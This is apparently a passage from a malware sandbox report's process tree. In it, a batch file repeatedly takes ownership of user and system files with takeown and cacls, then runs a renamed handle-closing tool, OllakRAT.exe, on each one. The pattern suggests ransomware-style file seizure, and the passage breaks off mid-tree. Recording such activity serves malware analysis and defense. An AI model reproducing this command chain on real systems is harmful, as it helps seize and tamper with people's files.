- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000008.bin" -nobanner
    3⤵
    PID:4572
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000008.bin" -nobanner
      4⤵
      PID:1088
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin""
  2⤵
  PID:4592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin" /E /G Admin:F /C
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin"
    3⤵
    - Modifies file permissions
    PID:5156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000M.bin" -nobanner
    3⤵
    PID:3080
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000M.bin" -nobanner
      4⤵
      PID:4584
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin""
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin" /E /G Admin:F /C
    3⤵
    PID:5152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin"
    3⤵
    PID:5768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000010.bin" -nobanner
    3⤵
    PID:5092
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000010.bin" -nobanner
      4⤵
      PID:6116
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin""
  2⤵
  PID:2244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin" /E /G Admin:F /C
    3⤵
    PID:4892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin"
    3⤵
    - Modifies file permissions
    PID:6132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000054.bin" -nobanner
    3⤵
    PID:304
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000054.bin" -nobanner
      4⤵
      PID:5420
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin""
  2⤵
  PID:5144
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin" /E /G Admin:F /C
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin"
    3⤵
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000072.bin" -nobanner
    3⤵
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000072.bin" -nobanner
      4⤵
      PID:2320
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin""
  2⤵
  PID:6080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin" /E /G Admin:F /C
    3⤵
    PID:5700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin"
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000007C.bin" -nobanner
    3⤵
    PID:3308
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000007C.bin" -nobanner
      4⤵
      PID:3104
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin""
  2⤵
  PID:908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin" /E /G Admin:F /C
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin"
    3⤵
    PID:2076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000007M.bin" -nobanner
    3⤵
    PID:4976
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000007M.bin" -nobanner
      4⤵
      PID:5256
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2504
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin""
  2⤵
  PID:5660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin" /E /G Admin:F /C
    3⤵
    PID:3084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin"
    3⤵
    PID:800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000008L.bin" -nobanner
    3⤵
    PID:4236
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000008L.bin" -nobanner
      4⤵
      PID:4116
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin""
  2⤵
  PID:3868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin" /E /G Admin:F /C
    3⤵
    PID:5464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin"
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000091.bin" -nobanner
    3⤵
    PID:6124
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000091.bin" -nobanner
      4⤵
      PID:872
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin""
  2⤵
  PID:2444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin" /E /G Admin:F /C
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin"
    3⤵
    - Modifies file permissions
    PID:5596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000009M.bin" -nobanner
    3⤵
    PID:4224
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000009M.bin" -nobanner
      4⤵
      PID:6064
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin""
  2⤵
  PID:4820
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin" /E /G Admin:F /C
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin"
    3⤵
    - Modifies file permissions
    PID:5444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "000000A7.bin" -nobanner
    3⤵
    PID:6108
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "000000A7.bin" -nobanner
      4⤵
      PID:6000
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin""
  2⤵
  PID:5264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin" /E /G Admin:F /C
    3⤵
    PID:3604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin"
    3⤵
    - Modifies file permissions
    PID:5332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000070.bin" -nobanner
    3⤵
    PID:3288
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000070.bin" -nobanner
      4⤵
      PID:5108
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin""
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin" /E /G Admin:F /C
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin"
    3⤵
    - Modifies file permissions
    PID:1132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000007A.bin" -nobanner
    3⤵
    PID:956
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000007A.bin" -nobanner
      4⤵
      PID:840
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin""
  2⤵
  PID:5548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin" /E /G Admin:F /C
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin"
    3⤵
    - Modifies file permissions
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000007K.bin" -nobanner
    3⤵
    PID:892
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000007K.bin" -nobanner
      4⤵
      PID:5300
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin""
  2⤵
  PID:6100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin" /E /G Admin:F /C
    3⤵
    PID:420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin"
    3⤵
    - Modifies file permissions
    PID:5208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000008J.bin" -nobanner
    3⤵
    PID:4244
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000008J.bin" -nobanner
      4⤵
      PID:2912
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin""
  2⤵
  PID:2188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin" /E /G Admin:F /C
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin"
    3⤵
    PID:3880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000008V.bin" -nobanner
    3⤵
    PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000008V.bin" -nobanner
      4⤵
      PID:3556
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5412
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:5576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    PID:3296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:4312
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:2296
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:6072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:5692
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:1896
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin""
  2⤵
  PID:5656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin" /E /G Admin:F /C
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin"
    3⤵
    PID:536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000009.bin" -nobanner
    3⤵
    PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000009.bin" -nobanner
      4⤵
      PID:5600
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin""
  2⤵
  PID:2644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin" /E /G Admin:F /C
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin"
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000N.bin" -nobanner
    3⤵
    PID:4336
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000N.bin" -nobanner
      4⤵
      PID:4572
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin""
  2⤵
  PID:5368
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin" /E /G Admin:F /C
    3⤵
    PID:1320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin"
    3⤵
    - Modifies file permissions
    PID:2932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000011.bin" -nobanner
    3⤵
    PID:3096
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000011.bin" -nobanner
      4⤵
      PID:4060
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:4252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:5316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    - Modifies file permissions
    PID:6076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1132
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "background.png" -nobanner
      4⤵
      PID:3216
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b317fc97-4d9f-4be6-a7f5-4915ca447c5a.1.etl""
  2⤵
  PID:5308
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b317fc97-4d9f-4be6-a7f5-4915ca447c5a.1.etl" /E /G Admin:F /C
    3⤵
    PID:5796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b317fc97-4d9f-4be6-a7f5-4915ca447c5a.1.etl"
    3⤵
    PID:5452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "MoUsoCoreWorker.b317fc97-4d9f-4be6-a7f5-4915ca447c5a.1.etl" -nobanner
    3⤵
    PID:4032
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "MoUsoCoreWorker.b317fc97-4d9f-4be6-a7f5-4915ca447c5a.1.etl" -nobanner
      4⤵
      PID:304
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.dc425040-6c8f-4f0c-a393-05b73f0b143f.1.etl""
  2⤵
  PID:2460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.dc425040-6c8f-4f0c-a393-05b73f0b143f.1.etl" /E /G Admin:F /C
    3⤵
    PID:5384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.dc425040-6c8f-4f0c-a393-05b73f0b143f.1.etl"
    3⤵
    PID:420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "WuProvider.dc425040-6c8f-4f0c-a393-05b73f0b143f.1.etl" -nobanner
    3⤵
    PID:5208
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "WuProvider.dc425040-6c8f-4f0c-a393-05b73f0b143f.1.etl" -nobanner
      4⤵
      PID:4804
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin""
  2⤵
  PID:504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin" /E /G Admin:F /C
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin"
    3⤵
    - Modifies file permissions
    PID:3608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000006D.bin" -nobanner
    3⤵
    PID:6004
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000006D.bin" -nobanner
      4⤵
      PID:1068
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin""
  2⤵
  PID:6048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin" /E /G Admin:F /C
    3⤵
    PID:2268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin"
    3⤵
    PID:3084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000006N.bin" -nobanner
    3⤵
    PID:3016
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000006N.bin" -nobanner
      4⤵
      PID:1604
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:2960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:4884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    PID:4448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:416
